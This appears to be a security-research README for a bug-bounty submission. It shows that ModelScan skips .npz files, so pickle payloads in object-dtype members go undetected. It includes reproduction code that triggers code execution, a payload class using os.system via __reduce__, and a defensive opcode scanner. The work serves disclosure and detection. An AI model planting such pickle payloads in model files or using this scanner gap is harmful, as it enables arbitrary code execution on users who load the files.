NPZ ModelScan Bypass PoC

Security Research - Huntr MFV Submission

This repository demonstrates that ModelScan skips .npz files entirely, reporting them as SCAN_NOT_SUPPORTED. An .npz file is a zip archive of .npy members, and a member with object dtype stores its data as a pickle stream, so a malicious .npz carrying an arbitrary-code-execution payload passes ModelScan with zero issues detected.

Files

  • malicious_model.npz - NPZ with os.system payload (simple RCE)
  • importlib_bypass.npz - NPZ with importlib.import_module bypass chain

Reproduction

import numpy as np

# WARNING: This executes code. Use in isolated environment only.
data = np.load('malicious_model.npz', allow_pickle=True)  # NpzFile is lazy: nothing runs yet
result = data['weights']  # RCE triggers here: the object-dtype member is unpickled on access

ModelScan Result

$ modelscan -p malicious_model.npz
Total issues: 0
Skipped: SCAN_NOT_SUPPORTED - Model Scan did not scan file
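ModelScan gives no signal here, so the check a practitioner wants is one that looks inside the archive before anything is loaded. The following is an added example, not code from this repository or from ModelScan: it reads each .npz member as an .npy record, identifies object-dtype members (the only ones that carry a pickle stream) and walks that stream's opcodes with pickletools to list the globals it would import, without unpickling anything. The sample it builds is constructed here with a harmless echo command and stands in for malicious_model.npz; the allowlist of numpy's own reconstruction globals is an assumption to be tuned per numpy version. Only the standard library is used, so the scan runs without importing numpy or touching the payload.

```python
import ast
import os
import pickle
import pickletools
import struct
import tempfile
import zipfile

NPY_MAGIC = b"\x93NUMPY"

# Globals a genuine numpy object-array pickle references (assumption: tune per numpy version).
NUMPY_ALLOWLIST = {
    "numpy.ndarray", "numpy.dtype",
    "numpy.core.multiarray._reconstruct", "numpy.core.multiarray.scalar",
    "numpy._core.multiarray._reconstruct", "numpy._core.multiarray.scalar",
}


def parse_npy_header(raw):
    """Parse the .npy preamble; return (header dict, byte offset where the data starts)."""
    if raw[:6] != NPY_MAGIC:
        raise ValueError("not a .npy member")
    major = raw[6]
    if major == 1:                       # format 1.0: uint16 little-endian header length
        hlen, start = struct.unpack("<H", raw[8:10])[0], 10
    elif major in (2, 3):                # format 2.0/3.0: uint32 header length
        hlen, start = struct.unpack("<I", raw[8:12])[0], 12
    else:
        raise ValueError(f"unsupported .npy format version {major}")
    header = ast.literal_eval(raw[start:start + hlen].decode("latin1"))
    return header, start + hlen


def descr_has_object(descr):
    """True if a dtype descr (string, or structured list of fields) contains an object field."""
    if isinstance(descr, str):
        return descr.lstrip("<>|=").startswith("O")
    return any(descr_has_object(field[1]) for field in descr)


def pickle_globals(stream):
    """Walk pickle opcodes and return the 'module.name' globals the stream would import."""
    found, strings = [], []
    for op, arg, _ in pickletools.genops(stream):
        if op.name == "GLOBAL":                                   # protocol <= 3: "module name"
            mod, _, name = arg.partition(" ")
            found.append(f"{mod}.{name}")
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:     # protocol 4+: last two strings
            found.append(f"{strings[-2]}.{strings[-1]}")
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


def scan_npz(path, allowlist=NUMPY_ALLOWLIST):
    """One finding per pickle-bearing member; numeric members hold raw bytes and are skipped."""
    findings = []
    with zipfile.ZipFile(path) as zf:
        for member in zf.namelist():
            raw = zf.read(member)
            header, offset = parse_npy_header(raw)
            if not descr_has_object(header["descr"]):
                continue
            globs = pickle_globals(raw[offset:])   # data section of an object member is a pickle
            findings.append({"member": member, "shape": header["shape"], "globals": globs,
                             "suspicious": [g for g in globs if g not in allowlist]})
    return findings


class Payload:
    """Constructed sample: pickling records os.system(cmd); only unpickling would run it."""
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def npy_bytes(descr, shape, body):
    """Hand-build a format-1.0 .npy record, header padded to a 64-byte boundary as numpy does."""
    header = f"{{'descr': '{descr}', 'fortran_order': False, 'shape': {shape!r}, }}"
    header += " " * (64 - ((10 + len(header) + 1) % 64)) + "\n"
    return NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(header)) + header.encode("latin1") + body


def build_sample_npz(path, cmd="echo npz-pickle-demo"):
    """Stand-in for malicious_model.npz (constructed): two object members using the GLOBAL and
    STACK_GLOBAL encodings plus a benign float32 vector. numpy writes protocol 3; an attacker need not."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("weights.npy", npy_bytes("|O", (1,), pickle.dumps(Payload(cmd), protocol=3)))
        zf.writestr("opt_state.npy", npy_bytes("|O", (1,), pickle.dumps(Payload(cmd), protocol=4)))
        zf.writestr("bias.npy", npy_bytes("<f4", (4,), struct.pack("<4f", 0.1, 0.2, 0.3, 0.4)))
    return path


def run_demo():
    """Build the sample in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_npz(build_sample_npz(os.path.join(tmp, "malicious_model.npz")))


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['member']}: shape={f['shape']} imports={f['globals']} suspicious={f['suspicious']}")
```

Run as a script it reports both object members and the `posix.system` (or `nt.system` on Windows) import each would perform; `bias.npy` produces no finding because a numeric dtype is read as raw bytes and never goes near pickle. The allowlist approach is deliberate: a real object array legitimately references numpy's reconstruction helpers, so anything else, including `importlib.import_module` or `builtins.getattr` used in a chained payload, surfaces as suspicious without needing a denylist entry for it.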

Impact

An attacker can upload a malicious .npz model file to a model hub. When a user downloads it and loads it with numpy.load(..., allow_pickle=True), the pickle stream inside the object-dtype member executes arbitrary code, and ModelScan gives no signal for this format. numpy's default is allow_pickle=False, under which an object-dtype member raises ValueError instead of being unpickled, so the bypass matters wherever pickling is enabled to load object arrays, and wherever a hub or pipeline relies on a clean ModelScan result to gate uploads.
